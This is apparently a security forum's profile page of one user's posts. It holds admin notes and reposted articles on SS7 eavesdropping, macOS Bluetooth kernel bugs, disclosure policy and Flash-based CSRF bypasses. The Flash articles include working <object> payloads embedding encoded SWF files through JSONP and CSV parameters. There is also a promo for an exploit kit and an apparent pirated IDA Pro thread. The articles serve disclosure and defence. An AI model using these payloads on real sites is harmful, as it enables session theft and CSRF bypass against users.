Everything posted by Nytro
-
Yes. I'm trying to move them and it's not working. The pages may end up looking really ugly.
-
I've set it up so you can give a Like OR a Dislike, not both. I'll see what else the plugin allows me to do. "Unlike" seems to be available only in the Pro version.
-
[h=3]Mobile eavesdropping via SS7 and first reaction from telecoms[/h] Mobile network operators and manufacturers have finally said a few words about the vulnerabilities in SS7 technology that allow an intruder to track subscribers, tap conversations and perform other serious attacks. We reported some of these vulnerabilities and attack schemes in May 2014 at Positive Hack Days IV, as well as here on our blog. In December 2014, these SS7 threats were brought to public attention again at the Chaos Communication Congress in Hamburg, where German researchers showed some new ways to intercept mobile phone calls using SS7. The research covered more than 20 networks worldwide, including T-Mobile in the United States. Meanwhile, the Washington Post reports that GSMA did not respond to queries seeking comment about the vulnerabilities in question. For the Post's August article on location tracking systems that use SS7, GSMA officials acknowledged problems with the network and said it was due to be replaced over the next decade because of a growing list of security and technical issues. The reply from T-Mobile was more abstract: "T-Mobile remains vigilant in our work with other mobile operators, vendors and standards bodies to promote measures that can detect and prevent these attacks." We also found the first official reaction from Huawei: Huawei has obtained the vulnerability information from open channels and launched a technical analysis. Again, not much is said, but it's better than nothing, considering that the SS7 problem is not new: it traces back to the 1970s. In the early 2000s the SIGTRAN specification was developed, allowing SS7 messages to be transferred over IP networks, but the security flaws in the upper layers of the SS7 protocol stack remained. Telecom engineers had been warning since 2001 that subscriber location tracking and fraud schemes using SS7 were possible. For obvious reasons, providers didn't want the public to know about these vulnerabilities. However, it is believed that law enforcement agencies have used SS7 vulnerabilities to spy on mobile networks for years. In 2014, it turned out that there are private companies providing the whole range of the above-mentioned services to anyone who wants them. For example, this is how the SkyLock service provided by the American company Verint works: the Washington Post notes that Verint does not use its capabilities against American and Israeli citizens, "but several similar systems, marketed in recent years by companies based in Switzerland, Ukraine and elsewhere, likely are free of such limitations". A more detailed description of this tracking technology and other SS7 attacks can be found in our report "Vulnerabilities in SS7 mobile networks", published in 2014. The data presented in that report were gathered by Positive Technologies experts in 2013 and 2014 while consulting on security analysis for several large mobile operators, and are supported by practical research into the detected vulnerabilities and features of the SS7 network. During network security testing, Positive Technologies experts managed to perform attacks such as discovering a subscriber's location, disrupting a subscriber's availability, SMS interception, USSD request forgery (and transfer of funds as a result of this attack), voice call redirection, conversation tapping and disrupting a mobile switch's availability. The testing revealed that even the top 10 telecom companies are vulnerable to these attacks.
Moreover, there are known cases of such attacks being performed at the international level, including discovering a subscriber's location and tapping conversations from other countries. Common features of these attacks: The intruder doesn't need sophisticated equipment. We used an ordinary computer running Linux and an SDK for generating SS7 packets, which is publicly available on the web. After performing one attack using SS7 commands, the intruder is able to perform the rest of the attacks using the same methods. For instance, if the intruder manages to determine a subscriber's location, only one step is left for SMS interception, transfer of funds, etc. The attacks are based on legitimate SS7 messages: you cannot simply filter these messages, because doing so may negatively affect the whole service. An alternative way to solve the problem is presented in the final section of the report. Read the full PDF report here. Sursa: http://blog.ptsecurity.com/2015/01/mobile-eavesdropping-via-ss7-and-first.html
-
I used to run vBSEO, but I never liked it: vBSEO's Vulnerability Leads to Remote Code Execution | Sucuri Blog. I've installed 3 new plugins from DragonByte: - Advanced Post Thanks / Like (replacement for the vBSEO Likes) - Advanced User Tagging (it had been installed for a while, I just updated it) - DragonByte SEO (replacement for vBSEO, with a similar link structure). So a whole bunch of problems may show up, both functional and security-related. If you find an issue, you can post it or send me a PM. An XSS gets you VIP. For anything else, we'll talk.
-
The problem is only with the Likes, I'm working on it. I hope it will be fixed by tonight.
-
WoltLab Burning Board 4.0 Tapatalk Cross Site Scripting & Open Redirect
Nytro replied to Aerosol's topic in Exploituri
These are exactly the issues that people on this forum reported for Talpashit (Tapatalk) for vBulletin 4. Those guys are clueless. -
Test. @Nytro @Nytrofdgdfgfdg
-
IDA Pro 6.6 + Hex Rays 2.0 (x86/x64/arm)
Nytro replied to old66's topic in Reverse engineering & exploit development
Why do you need 6.7? Here is the changelog: https://www.hex-rays.com/products/ida/6.7/ -
I've installed a new mobile theme for you. You should be able to browse the forum more easily now.
-
IDA Pro 6.6 + Hex Rays 2.0 (x86/x64/arm)
Nytro replied to old66's topic in Reverse engineering & exploit development
The first version is perfect. Hex-Rays is worth every penny. -
IDA Pro 6.6 + Hex Rays 2.0 (x86/x64/arm)
Nytro replied to old66's topic in Reverse engineering & exploit development
Tested, it works, decompiler for x64 included. Thanks! -
Point, Click, Root. More than 300 exploits! Presented at Black Hat 2014. Version 3.3.3. More than 300 exploits. Military-grade professional security tool. Exploit Pack comes into play when you need to execute a pentest in a real environment; it provides you with all the tools needed to gain access and persist through the use of remote reverse agents. Remote Persistent Agents: reverse a shell and escalate privileges. Exploit Pack provides a complete set of features to create your own custom agents; you can include exploits or deploy your own personalized shellcodes directly into the agent. Write your own exploits: use Exploit Pack as a learning platform. Quick exploit development, extend your capabilities and code your own custom exploits using the Exploit Wizard and the built-in Python editor, modded to fulfill the needs of an exploit writer. Sursa: Exploit Pack
-
ExecutedProgramsList [h=4]Description[/h] ExecutedProgramsList is a simple tool that displays a list of programs and batch files that you previously executed on your system. For every program, ExecutedProgramsList displays the .exe file, the created/modified time of the .exe file, and the current version information of the program (product name, product version, company name) if it's available. For some of the programs, the last execution time of the program is also displayed. [h=4]System Requirements[/h] This utility works on any version of Windows, starting from Windows XP and up to Windows 8. Both 32-bit and 64-bit systems are supported. [h=4]Data Source[/h] The list of previously executed programs is collected from the following data sources:
- Registry key: HKEY_CURRENT_USER\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
- Registry key: HKEY_CURRENT_USER\Microsoft\Windows\ShellNoRoam\MUICache
- Registry key: HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted
- Registry key: HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store
- Windows Prefetch folder (C:\Windows\Prefetch)
Sursa: ExecutedProgramsList - Shows programs previously executed on your system
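For readers who want to poke at one of the data sources listed above by hand, here is a minimal Python sketch (my own, not part of the NirSoft tool) that enumerates the MuiCache key; the key path comes from the post, everything else is illustrative:

[code]
# Minimal sketch (not part of ExecutedProgramsList): enumerate the MuiCache
# registry key listed above. HKCU\Classes\... is reachable via
# HKCU\Software\Classes\... when opened through the API.
import winreg

MUICACHE = r"Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache"

def list_muicache():
    """Yield (value_name, data) pairs from the MuiCache key."""
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, MUICACHE) as key:
        index = 0
        while True:
            try:
                name, data, _type = winreg.EnumValue(key, index)
            except OSError:        # no more values to enumerate
                return
            yield name, data
            index += 1

if __name__ == "__main__":
    for name, data in list_muicache():
        print(f"{name} -> {data}")
[/code]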
-
[h=1]Crypto200 with The POODLE Attack[/h] Tetcon is one of the biggest security conferences in Viet Nam. There are various talks, given in both Vietnamese and English. This year, for the first time, the organizers decided to host a hacking challenge, a Capture The Flag (CTF)! While the CTF was running, I solved 3 tasks: getit, next and "Who let the dog out?". The first two tasks are not that hard; you should try them yourself. In this post, I would like to talk about "Who let the dog out?". It's about a cryptography attack, specifically the POODLE attack, and the author of this task is Thai Duong (thaidn), one of the experts who discovered this attack. Download: [TetCON CTF 2015] Crypto200 with The POODLE Attack
-
Cryptography Exercises - Contents:
1. Source coding
2. Caesar Cipher
3. Ciphertext-only Attack
4. Classification of Cryptosystems - Network Nodes
5. Properties of modulo Operation
6. Vernam Cipher
7. Public-Key Algorithms
8. Double Encryption
9. Vigenere Cipher and Transposition
10. Permutation Cipher
11. Substitution Cipher
12. Substitution + Transposition
13. Affine Cipher
14. Perfect Secrecy
15. Feistel Cipher
16. Block Cipher
17. Digital Encryption Standard (DES)
18. Primitive Element
19. Diffie-Hellman Key Exchange
20. Pohlig-Hellman a-symmetric Encryption
21. ElGamal
22. RSA System
23. Euclid's algorithm
24. Protocol Failure
25. Complexity
26. Authentication
27. Protocols
28. Hash Functions
29. Cipher Modes
30. Pseudo Random Number Generators
31. Linear Feedback Shift Register
32. Challenge Response
33. Application of error correcting codes in biometric authentication
34. General Problems
Download: http://www.iem.uni-due.de/~vinck/crypto/problems-crypto.pdf
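As a quick warm-up for the first cipher exercises in the list (my own illustration, not taken from the exercise booklet), here is a minimal Caesar cipher in Python:

[code]
# Minimal Caesar cipher sketch (my own illustration, not from the booklet):
# shift each letter by a fixed key, the subject of exercise 2 and the classic
# target of the ciphertext-only attack in exercise 3.
import string

ALPHABET = string.ascii_uppercase

def caesar(text: str, key: int) -> str:
    shifted = ALPHABET[key % 26:] + ALPHABET[:key % 26]
    table = str.maketrans(ALPHABET, shifted)
    return text.upper().translate(table)

if __name__ == "__main__":
    ct = caesar("ATTACK AT DAWN", 3)
    print(ct)               # DWWDFN DW GDZQ
    print(caesar(ct, -3))   # decrypt by shifting back
[/code]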
-
Analyzing Man-in-the-Browser (MITB) Attacks The Matrix is real and living inside your browser. How, you ask? In the form of malware that targets your financial institutions. The malware does not have to target the institution directly, but rather your Internet browser. By changing what you see in the browser, the attackers gain the ability to steal any information that you enter and to display whatever they choose. This has become known as the Man-in-the-Browser (MITB) attack. Download: https://www.sans.org/reading-room/whitepapers/forensics/analyzing-man-in-the-browser-mitb-attacks-35687
-
(This post is joint work with @joystick; see also his blog here.) Motivated by our previous findings, we performed some more tests on the IOBluetoothHCIController service of the latest version of Mac OS X (Yosemite 10.10.1), and we found five additional security issues. The issues have been reported to Apple Security and, since the deadline we agreed upon with them has expired, we now disclose details & PoCs for four of them (the last one was reported a few days later and is still under investigation by Apple). All the issues are in class IOBluetoothHCIController, implemented in the IOBluetoothFamily kext (md5 e4123caff1b90b81d52d43f9c47fec8f). [h=3]Issue 1 (crash-issue1.c)[/h] Many callback routines handled by IOBluetoothHCIController blindly dereference pointer arguments without checking them. The caller of these callbacks, IOBluetoothHCIUserClient::SimpleDispatchWL(), may actually pass NULL pointers, which are eventually dereferenced. More precisely, every user-space argument handled by SimpleDispatchWL() consists of a value and a size field (see crash-issue1.c for details). When a user-space client provides an argument with a NULL value but a large size, a subsequent call to IOMalloc(size) fails, returning a NULL pointer that is eventually passed to callees, causing the NULL pointer dereference. The PoC we provide targets method DispatchHCICreateConnection(), but the very same approach can be used to cause a kernel crash using other callback routines (basically any other callback that receives one or more pointer arguments). At first, we ruled out this issue as a mere local DoS. However, as discussed here, Yosemite only partially prevents mapping the NULL page from user space, so it is still possible to exploit NULL pointer dereferences to mount LPE attacks. For instance, the following code can be used to map page zero:

Mac:tmp $ cat zeropage.c
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach/vm_map.h>
#include <stdio.h>

int main(int argc, char **argv) {
  mach_vm_address_t addr = 0;
  /* remove any existing mapping at address zero, then allocate it as a fixed allocation */
  vm_deallocate(mach_task_self(), 0x0, 0x1000);
  int r = mach_vm_allocate(mach_task_self(), &addr, 0x1000, 0);
  printf("%08llx %d\n", addr, r);
  *((uint32_t *)addr) = 0x41414141;
  printf("%08x\n", *((uint32_t *)addr));
}
Mac:tmp $ llvm-gcc -Wall -o zeropage{,.c} -Wl,-pagezero_size,0 -m32
Mac:tmp $ ./zeropage
00000000 0
41414141
Mac:tmp $

Trying the same without the -m32 flag results in the 64-bit Mach-O being blocked at load time by the OS with the message "Cannot enforce a hard page-zero for ./zeropage" (unless you do it as "root", but then what's the point?). [h=3]Issue 2 (crash-issue2.c)[/h] As shown in the screenshot below, IOBluetoothHCIController::BluetoothHCIChangeLocalName() is affected by an "old-school" stack-based buffer overflow, due to a bcopy(src, dest, strlen(src)) call where src is fully controlled by the attacker. To the best of our knowledge, this bug cannot be directly exploited due to the existing stack canary protection. However, it may still be useful to mount an LPE attack if used in conjunction with a memory leak vulnerability, leveraged to disclose the canary value.
[Figure: Issue 2, a plain stack-based buffer overflow]
[h=3]Issue 3 (crash-issue3.c)[/h] IOBluetoothHCIController::TransferACLPacketToHW() receives as an input parameter a pointer to an IOMemoryDescriptor object.
The function carefully checks that the supplied pointer is non-NULL; however, regardless of the outcome of this test, it then dereferences the pointer (see the figure below; the attacker-controlled input parameter is stored in register r15). The IOMemoryDescriptor object is created by the caller (DispatchHCISendRawACLData()) using the IOMemoryDescriptor::withAddress() constructor. As this constructor is provided with a user-controlled value, it may fail and return a NULL pointer. See the Issue 1 discussion regarding the exploitability of NULL pointer dereferences on Yosemite.
[Figure: Issue 3, the module checks if r15 is NULL, but dereferences it anyway]
[h=3]Issue 4 (lpe-issue1.c)[/h] In this case, the problem is due to a missing sanity check on the arguments of the following function:

IOReturn BluetoothHCIWriteStoredLinkKey(
    uint32_t req_index,
    uint32_t num_of_keys,
    BluetoothDeviceAddress *p_device_addresses,
    BluetoothKey *p_bluetooth_keys,
    BluetoothHCINumLinkKeysToWrite *outNumKeysWritten);

The first parameter, req_index, is used to find an HCI request in the queue of allocated HCI requests (thus this exploit first requires filling this queue with possibly fake requests). The second integer parameter (num_of_keys) is used to calculate the total size of the other inputs, respectively pointed to by p_device_addresses and p_bluetooth_keys. As shown in the screenshot below, these values are not checked before being passed to function IOBluetoothHCIController::SendHCIRequestFormatted(), which has the following prototype:

IOReturn SendHCIRequestFormatted(uint32_t req_index, uint16_t inOpCode,
                                 uint64_t outResultsSize, void *outResultBuf,
                                 const char *inFormat, ...);

[Figure: Issue 4, an exploitable buffer overflow]
The passed format string "HbbNN" will eventually cause size_of_addresses bytes to be copied from p_device_addresses to outResultBuf in reverse order (the 'N' format consumes two arguments: the first is a size, the second a pointer to read from). If the calculated size_of_addresses is big enough (i.e., if we provide a big enough num_of_keys parameter), the copy overflows outResultBuf, trashing everything above it, including a number of function pointers in the vtable of an HCI request object. These pointers are overwritten with attacker-controlled data (i.e., the data pointed to by p_bluetooth_keys) and are called before returning to user space, so we can divert execution wherever we want. As a PoC, lpe-issue1.c exploits this bug and attempts to call a function located at the attacker-controlled address 0x4141414142424242. Please note that the attached PoC requires some more tuning before it can cleanly return to user space, since more than one vtable pointer is corrupted during the overflow and needs to be fixed with valid pointers.
[Figure: Execution of our "proof-of-concept" exploit (Issue 4)]
[h=3]Notes[/h] None of the PoCs we provide in this post are "weaponized", i.e., they do not contain a real payload, nor do they attempt to bypass existing security features of Yosemite (e.g., kASLR and SMEP).
If you're interested in bypass techniques (as you probably are, if you made it here), Ian Beer of Google Project Zero covered pretty much all of it in a very thorough blog post. In that case, he used a leak in the IOKit registry to calculate the kslide and defeat kASLR, while he used an in-kernel ROP chain to bypass SMEP. More recently, @i0n1c posted here about how kASLR is fundamentally broken on Mac OS X at the moment. [h=3]Conclusions[/h] Along with the last issue identified, we shared with Apple our conclusions on this kext: based on the issues we identified, we speculate there are many other crashes and LPE vulnerabilities in it. Ours, however, is just a best-effort analysis done in our spare time, and given the very small effort it took us to identify the vulnerabilities, we would suggest a serious security evaluation of the whole kext code. [h=3]Disclosure timeline[/h] 02/11: Notification of issues 1, 2 and 3. 23/11: No answer received from Apple; notification of issue 4. As no answer had been received since the first contact, we proposed December 2 as a possible disclosure date. 25/11: Apple answers, requesting more time. We propose to move the disclosure date to January 12. 27/11: Apple accepts the new deadline. 05/12: We contact Apple asking for the status of the vulnerabilities. 06/12: Apple says they're still "investigating the issue". 23/12: Notification of a new issue (#5), proposing January 23 as a tentative disclosure date. 06/01: Apple asks for more time for issue #5. We propose to move its disclosure date to February 23 and remind them of our intention to disclose the 4 previous issues on January 12. 12/01: No answer from Apple; disclosing the first 4 issues. Sursa: Roberto Paleari's blog: Time to fill OS X (Blue)tooth: Local privilege escalation vulnerabilities in Yosemite
-
A Call for Better Coordinated Vulnerability Disclosure Chris Betz 11 Jan 2015 6:49 PM For years our customers have been in the trenches against cyberattacks in an increasingly complex digital landscape. We’ve been there with you, as have others. And we aren’t going anywhere. Forces often seek to undermine and disrupt technology and people, attempting to weaken the very devices and services people have come to depend on and trust. Just as malicious acts are planned, so too are counter-measures implemented by companies like Microsoft. These efforts aim to protect everyone against a broad spectrum of activity ranging from phishing scams that focus on socially engineered trickery, to sophisticated attacks by persistent and determined adversaries. (And yes, people have a role to play – strong passwords, good policies and practices, keeping current to the best of your ability, detection and response, etc. But we’ll save those topics for another day). With all that is going on, this is a time for security researchers and software companies to come together and not stand divided over important protection strategies, such as the disclosure of vulnerabilities and the remediation of them. In terms of the software industry at large and each player’s responsibility, we believe in Coordinated Vulnerability Disclosure (CVD). This is a topic that the security technology profession has debated for years. Ultimately, vulnerability collaboration between researchers and vendors is about limiting the field of opportunity so customers and their data are better protected against cyberattacks. Those in favor of full, public disclosure believe that this method pushes software vendors to fix vulnerabilities more quickly and makes customers develop and take actions to protect themselves. We disagree. Releasing information absent context or a stated path to further protections, unduly pressures an already complicated technical environment. It is necessary to fully assess the potential vulnerability, design and evaluate against the broader threat landscape, and issue a “fix” before it is disclosed to the public, including those who would use the vulnerability to orchestrate an attack. We are in this latter camp. CVD philosophy and action is playing out today as one company - Google - has released information about a vulnerability in a Microsoft product, two days before our planned fix on our well known and coordinated Patch Tuesday cadence, despite our request that they avoid doing so. Specifically, we asked Google to work with us to protect customers by withholding details until Tuesday, January 13, when we will be releasing a fix. Although following through keeps to Google’s announced timeline for disclosure, the decision feels less like principles and more like a “gotcha”, with customers the ones who may suffer as a result. What’s right for Google is not always right for customers. We urge Google to make protection of customers our collective primary goal. Microsoft has long believed coordinated disclosure is the right approach and minimizes risk to customers. We believe those who fully disclose a vulnerability before a fix is broadly available are doing a disservice to millions of people and the systems they depend upon. Other companies and individuals believe that full disclosure is necessary because it forces customers to defend themselves, even though the vast majority take no action, being largely reliant on a software provider to release a security update. 
Even for those able to take preparatory steps, risk is significantly increased by publicly announcing information that a cybercriminal could use to orchestrate an attack, and assumes those that would take action are made aware of the issue. Of the vulnerabilities privately disclosed through coordinated disclosure practices and fixed each year by all software vendors, we have found that almost none are exploited before a "fix" has been provided to customers, and even after a "fix" is made publicly available only a very small amount are ever exploited. Conversely, the track record of vulnerabilities publicly disclosed before fixes are available for affected products is far worse, with cybercriminals more frequently orchestrating attacks against those who have not or cannot protect themselves. Another aspect of the CVD debate has to do with timing: specifically, the amount of time that is acceptable before a researcher broadly communicates the existence of a vulnerability. Opinion on this point varies widely. Our approach, and one that we have advocated others adopt, is that researchers work with the vendor to deliver an update that protects customers prior to releasing details of the vulnerability. There are certainly cases where lack of response from a vendor(s) challenges that plan, but still the focus should be on protecting customers. You can see our values in action through our own security experts who find and report vulnerabilities in many companies' products, some of which we receive credit for, and many that are unrecognized publicly. We don't believe it would be right to have our security researchers find vulnerabilities in competitors' products, apply pressure that a fix should take place in a certain timeframe, and then publicly disclose information that could be used to exploit the vulnerability and attack customers before a fix is created. Responding to security vulnerabilities can be a complex, extensive and time-consuming process. As a software vendor this is an area in which we have years of experience. Some of the complexity in the timing discussion is rooted in the variety of environments that we as security professionals must consider: real-world impact in customer environments, the number of supported platforms the issue exists in, and the complexity of the fix. Vulnerabilities are not all made equal nor according to a well-defined measure. And, an update to an online service can have different complexity and dependencies than a fix to a software product, a decade-old software platform on which tens of thousands have built applications, or hardware devices. Thoughtful collaboration takes these attributes into account. To arrive at a place where important security strategies protect customers, we must work together. We appreciate and recognize the positive collaboration, information sharing and results-orientation underway with many security players today. We ask that researchers privately disclose vulnerabilities to software providers, working with them until a fix is made available before sharing any details publicly. It is in that partnership that customers benefit the most. Policies and approaches that limit or ignore that partnership do not benefit the researchers, the software vendors, or our customers. It is a zero-sum game where all parties end up injured. Let's face it, no software is perfect. It is, after all, made by human beings.
Microsoft has a responsibility to work in our customers' best interest to address security concerns quickly, comprehensively, and in a manner that continues to enable the vast ecosystem that provides technology to positively impact people's lives. Software is organic, usage patterns and practices change, and new systems are built on top of products that test (and in some cases exceed) the limits of their original design. In many ways that's the exciting part of software within the rapidly evolving world that we live in. Stating these points isn't in any way an abdication of responsibility. It is our job to build the best possible software that we can, and to protect it continuously to the very best of our ability. We're all in. Chris Betz Senior Director, MSRC Trustworthy Computing [Note: In our own CVD policy (available at microsoft.com/cvd), we do mention exceptions for cases in which we might release an advisory about a vulnerability in a third party's software before an update is ready, including when the technical details have become publicly known, when there is evidence of exploitation of an unpatched vulnerability, and when the vendor fails to respond to requests for discussion.] Sursa: A Call for Better Coordinated Vulnerability Disclosure - MSRC - Site Home - TechNet Blogs
-
The pitfalls of allowing file uploads on your website These days a lot of websites allow users to upload files, but many don't know about the unknown pitfalls of letting users (potential attackers) upload files, even valid files. What's a valid file? Usually, a restriction would be on two parameters: the uploaded file extension and the uploaded Content-Type. For example, the web application could check that the extension is "jpg" and the Content-Type "image/jpeg" to make sure it's impossible to upload malicious files. Right? The problem is that plugins like Flash don't care about extension and Content-Type. If a file is embedded using an <object> tag, it will be executed as a Flash file as long as the content of the file looks like a valid Flash file. But wait a minute! Shouldn't the Flash be executed within the domain that embeds the file using the <object> tag? Yes and no. If a Flash file (bogus image file) is uploaded on victim.com and then embedded at attacker.com, the Flash file can execute JavaScript within the domain of attacker.com. However, if the Flash file sends requests, it will be allowed to read files within the domain of victim.com. This basically means that if a website allows file uploads without validating the content of the file, an attacker can bypass any CSRF protection on the website. The attack Based on these facts we can create an attack scenario like this: An attacker creates a malicious Flash (SWF) file. The attacker changes the file extension to JPG. The attacker uploads the file to victim.com. The attacker embeds the file on attacker.com using an <object> tag with type "application/x-shockwave-flash". The victim visits attacker.com, which loads the file embedded with the <object> tag. The attacker can now send and receive arbitrary requests to victim.com using the victim's session. The attacker sends a request to victim.com and extracts the CSRF token from the response. A payload could look like this: <object style="height:1px;width:1px;" data="http://victim.com/user/2292/profilepicture.jpg" type="application/x-shockwave-flash" allowscriptaccess="always" flashvars="c=read&u=http://victim.com/secret_file.txt"></object> The fix The good news is that there's a fairly easy way to prevent Flash from doing this. Flash won't execute the file if it is served with a Content-Disposition header like so: Content-Disposition: attachment; filename="image.jpg" So if you allow file uploads or print arbitrary user data in your service, you should always verify the contents as well as send a Content-Disposition header where applicable. Another way to remediate issues like this is to host the uploaded files on a separate domain (like websiteusercontent.com). Other uses But the fun doesn't stop at file uploads! Since the only requirement of this attack is that an attacker can control the data at a location on the target domain (regardless of Content-Type), there's more than one way to perform this attack. One way would be to abuse a JSONP API. Usually, the attacker can control the output of a JSONP API endpoint by changing the callback parameter. However, if an attacker uses an entire Flash file as the callback, we can use it just like we would use an uploaded file in this attack.
A payload could look like this: <object style="height:1px;width:1px;" data="http://victim.com/user/jsonp?callback=CWS%07%0E000x%9C%3D%8D1N%C3%40%10E%DF%AE%8D%BDI%08%29%D3%40%1D%A0%A2%05%09%11%89HiP%22%05D%8BF%8E%0BG%26%1B%D9%8E%117%A0%A2%DC%82%8A%1Br%04X%3B%21S%8C%FE%CC%9B%F9%FF%AA%CB7Jq%AF%7F%ED%F2%2E%F8%01%3E%9E%18p%C9c%9Al%8B%ACzG%F2%DC%BEM%EC%ABdkj%1E%AC%2C%9F%A5%28%B1%EB%89T%C2Jj%29%93%22%DBT7%24%9C%8FH%CBD6%29%A3%0Bx%29%AC%AD%D8%92%FB%1F%5C%07C%AC%7C%80Q%A7Nc%F4b%E8%FA%98%20b%5F%26%1C%9F5%20h%F1%D1g%0F%14%C1%0A%5Ds%8D%8B0Q%A8L%3C%9B6%D4L%BD%5F%A8w%7E%9D%5B%17%F3%2F%5B%DCm%7B%EF%CB%EF%E6%8D%3An%2D%FB%B3%C3%DD%2E%E3d1d%EC%C7%3F6%CD0%09" type="application/x-shockwave-flash" allowscriptaccess="always" flashvars="c=alert&u=http://victim.com/secret_file.txt"></object> tl;dr: Send Content-Disposition headers for uploaded files and validate your JSONP callback names. Or put the uploaded files on a separate domain And like always, if you want to know if your website has issues like these, try a Detectify scan! That’s it for now. Written by: Mathias, Frans Sursa: Detectify Blog – The pitfalls of allowing file uploads on your...
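As an illustration of the fix described above (my own sketch, not part of the Detectify post), here is a file-serving route that always sends a Content-Disposition: attachment header; Flask and the upload directory are assumptions used only for the example:

[code]
# Minimal sketch of the recommended fix: serve user-uploaded files with a
# Content-Disposition: attachment header so plugins such as Flash refuse to
# execute them in the page context. Flask and UPLOAD_DIR are illustrative.
from flask import Flask, send_from_directory

app = Flask(__name__)
UPLOAD_DIR = "/var/www/uploads"   # hypothetical storage location

@app.route("/uploads/<path:filename>")
def serve_upload(filename):
    # as_attachment=True makes Flask emit
    # "Content-Disposition: attachment; filename=<filename>"
    return send_from_directory(UPLOAD_DIR, filename, as_attachment=True)

if __name__ == "__main__":
    app.run()
[/code]

Hosting the files on a separate domain, as the post also suggests, complements this: even if a file slips through, it no longer originates from the main site's origin.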
-
Content-Type Blues Assuming an attacker can control the start of a CSV file served up by a web application, what damage could be done? The example PHP code below serves up a basic CSV file, but allows the user to control the column names. Note that the Content-Type header is at least set properly. <?php header('Content-Type: text/csv'); header('Content-Disposition: inline; filename=blah.csv'); header('Content-Length: ' . 20); echo $_GET["columnNames"] . "\r\n"; echo "1,2,3,4,5\r\n"; echo "data,we,do,not,control"; ?> Our first attempt might involve injecting in a XSS payload. http://target/csvServe.php?columnNames=a,b,c,d,e<html><body><script>alert(1)</script></body</html> This seems like a reasonable approach since the application accepts and uses the columnNames parameter without performing any input validation or output encoding. But, the browser, even our old friend IE, will not render the content as HTML due to the Content-Type header’s value (text/csv). Note that this would be exploitable if the Content-Type header was set to text/plain instead, because IE will perform content sniffing in that situation. Out of luck? Nope, just inject in an entire SWF file into the columnNames parameter. A SWF’s origin is the domain from which it was retrieved from, similar to a Java applet (uses IP addresses instead of domain names though), therefore a malicious page could embed a SWF, which originates from the target’s domain that could make arbitrary requests to the target domain and read the responses (steal sensitive data, defeat CSRF protections, and other generally nasty actions). But, what about the data in the CSV that we don’t control? The Flash Player will ignore the content following a well formed SWF and execute the SWF properly. The following JavaScript code snippet demonstrates this technique. Since both browsers and HTTP servers impose limits on the length of URLs, I would recommend writing the payload in ActionScript 2 using a command-line compiler like MTASC or an assembler like Flasm in order to craft a small SWF. Sadly, Flex is bloated, so mxmlc is not an option. <script> var flashvars = {}; var params = {}; var attributes = {}; var url="http://target/csvServe.php?columnNames=CWS%07%AA%01%00%00x%DADP%C1N%021%14%9C%ED%22-j0%21%24%EB%81%03z%E3%E2%1F%18XI%88%1E%607%C0%C1%8B%D9%ACP%91X%ECf%A9%01%BF%40N%1C%F7%E6%DD%CF%F1%8F%F0%B5K%E2%3BL%DFL%DA%E9%9B%B7%05%FF%05%82%0Chz%E8%B3%03U%AD%0A%AA%D8%23%E8%D6%9B%84%D4%C5I%12%A7%B3%B7t%21%D77%D3%0F%A3q%A8_%DA%0B%F1%EE%09gpJ%B2P%FA9U0%2FHr%AD%0Df%B9L%8D%9C%CA%AD%19%2C%A5%9A%C3P%87%7B%A9%94not%AE%E6%ED%2Bd%B96%DA%7Cf%12%ABt%F9%8E4%CB%10N%26%D2%C4%B9%CE%06%2A%5D%ACQ0%08%B4%1A%8Do%86%1FG%BC%96%93%F6%C2%0E%C9%3A%08Q%5C%83%3F2%80%B7%7D%02%2B%FF%83%60%DC%A6%11%BE%7BU%19%07%F6%28%09%1B%15%15%88%13Q%8D%BE%28ID%84%28%1F%11%F1%82%92%88%FD%B9%0D%EFw%C0V34%8F%B3%145%88Zi%8E%5E%14%15%17%E0v%13%AC%E2q%DF%8A%A7%B7%01%BA%FE%1D%B5%BB%16%B9%0C%A7%E1%A4%9F%0C%C3%87%11%CC%EBr%5D%EE%CA%A5uv%F6%EF%E0%98%8B%97N%82%B9%F9%FCq%80%1E%D1%3F%00%00%00%FF%FF%03%00%84%26N%A8"; swfobject.embedSWF(url, "content", "400", "200", "10.0.0", "expressInstall.swf", flashvars, params, attributes); </script> Ideally, web applications wouldn’t accept arbitrary content to build a CSV, but the Flash Player could also take steps to prevent this attack from occurring. The following improvements could be made, but will likely break some existing RIAs that fail to set the Content-Type header properly on their SWFs. 
1) Refuse to play any SWF that does not have a correct MIME type (application/x-shockwave-flash). 2) Refuse to play any SWF that has erroneous data at the end of the file. Moral of the story: setting the content type properly is not a substitute for proper input validation. Sursa: Content-Type Blues | dead && end
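To illustrate the "proper input validation" the post closes with (my own sketch, not from the original article), here is a small check that rejects column names containing anything outside a safe character set before the CSV is built; the columnNames parameter name is taken from the PHP example above:

[code]
# Minimal sketch (my addition): whitelist-validate the user-supplied column
# names before echoing them into a CSV, so an embedded SWF never reaches the
# response body. Framework-free, CGI-style handling of the query string.
import re
import sys
from urllib.parse import parse_qs

SAFE_COLUMN = re.compile(r"^[A-Za-z0-9_ ]{1,64}$")

def build_csv(query_string: str) -> str:
    params = parse_qs(query_string)
    columns = params.get("columnNames", [""])[0].split(",")
    if not all(SAFE_COLUMN.match(c) for c in columns):
        raise ValueError("rejecting column names with unexpected characters")
    rows = ["1,2,3,4,5", "data,we,do,not,control"]
    return "\r\n".join([",".join(columns)] + rows)

if __name__ == "__main__":
    print(build_csv("columnNames=a,b,c,d,e"))        # accepted
    try:
        build_csv("columnNames=a,b,CWS%07evil")       # rejected (SWF-like junk)
    except ValueError as e:
        print(e, file=sys.stderr)
[/code]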
-
